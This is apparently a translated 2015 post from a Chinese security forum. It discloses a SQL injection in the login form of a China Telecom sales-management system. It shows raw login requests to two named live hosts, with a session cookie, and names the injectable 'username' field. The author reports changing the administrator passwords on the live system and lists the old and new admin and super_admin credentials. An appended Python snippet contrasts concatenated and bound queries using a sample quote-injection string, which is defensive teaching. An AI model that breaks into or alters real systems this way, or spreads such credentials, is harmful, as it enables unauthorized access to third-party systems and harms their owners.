SQL Injection Vulnerability in the Login Form of a China Telecom System - 华盟网 - http://www.77169.org

[Image set] SQL Injection Vulnerability in the Login Form of a China Telecom System

2015/6/26 Author: 彩儿 Source: compiled by this site




  The China Telecom Sales Manager System (销售管家系统), version 3.0, has a SQL injection in its login form.

  POST /install/login.php HTTP/1.1
  Content-Length: 209
  Content-Type: application/x-www-form-urlencoded
  X-Requested-With: XMLHttpRequest
  Referer: http://sdgree.grirms.com:80/
  Cookie: PHPSESSID=edq5psps1jo1fvo13cea7uku05; grirms_grirms_remember_me=ogfdiclb
  Host: sdgree.grirms.com
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
  Accept: */*

  auth_code=94102&password=admin&referer=&remember_me=on&username=admin

  Parameter: username

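  At login the system reported that the password had expired and had to be changed, so the administrator passwords were changed.
  Original password: admin/sdgree1234567
  Current password: admin/Sdgree123
  Original password: super_admin/sdgree1111111
  Current password: super_admin/Sdgree123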

  Other case: http://bx.grirms.com/

  POST /install/login.php HTTP/1.1
  Content-Length: 209
  Content-Type: application/x-www-form-urlencoded
  X-Requested-With: XMLHttpRequest
  Referer: http://bx.grirms.com:80/install/login.php
  Host: bx.grirms.com
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
  Accept: */*

  auth_code=94102&password=admin&referer=&remember_me=on&username=admin
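
  The report names the username field of /install/login.php as the injectable parameter but does not show the server-side code. The following is an added example, not code from the original page or from the affected product: it contrasts a concatenated user lookup with a bound-parameter lookup for the same form fields. The SQLite schema, the demo_user account and all function names are assumptions, and the inputs are constructed.

```python
import hashlib
import hmac
import os
import sqlite3
from urllib.parse import parse_qs

def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_demo_db():
    """In-memory user table; schema and account are constructed for this example."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("demo_user", salt, hash_password("constructed-demo-secret", salt)))
    return db

def find_user_concat(db, username):
    # Vulnerable pattern: the form value becomes part of the SQL text,
    # so a quote inside it changes the structure of the WHERE clause.
    sql = "SELECT salt, pw_hash FROM users WHERE username = '" + username + "'"
    return db.execute(sql).fetchone()

def find_user_bound(db, username):
    # Hardened pattern: the value is bound as data and is never parsed as SQL.
    return db.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                      (username,)).fetchone()

def login(db, body):
    """Handle a form-encoded login body using only the bound lookup."""
    form = parse_qs(body, keep_blank_values=True)
    username = form.get("username", [""])[0]
    password = form.get("password", [""])[0]
    if not username or len(username) > 64:
        return False
    row = find_user_bound(db, username)
    if row is None:
        return False
    salt, pw_hash = row
    return hmac.compare_digest(hash_password(password, salt), pw_hash)

if __name__ == "__main__":
    db = make_demo_db()
    quoted = "nobody' OR '1'='1"  # constructed input containing SQL quote characters
    print("concatenated lookup matched a row:", find_user_concat(db, quoted) is not None)
    print("bound lookup matched a row:", find_user_bound(db, quoted) is not None)
    print("login with the field values from the request above:",
          login(db, "auth_code=94102&password=admin&referer=&remember_me=on&username=admin"))
```

  The same bound-parameter rule applies to every query the login handler builds from request fields, not only the one that reads username.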


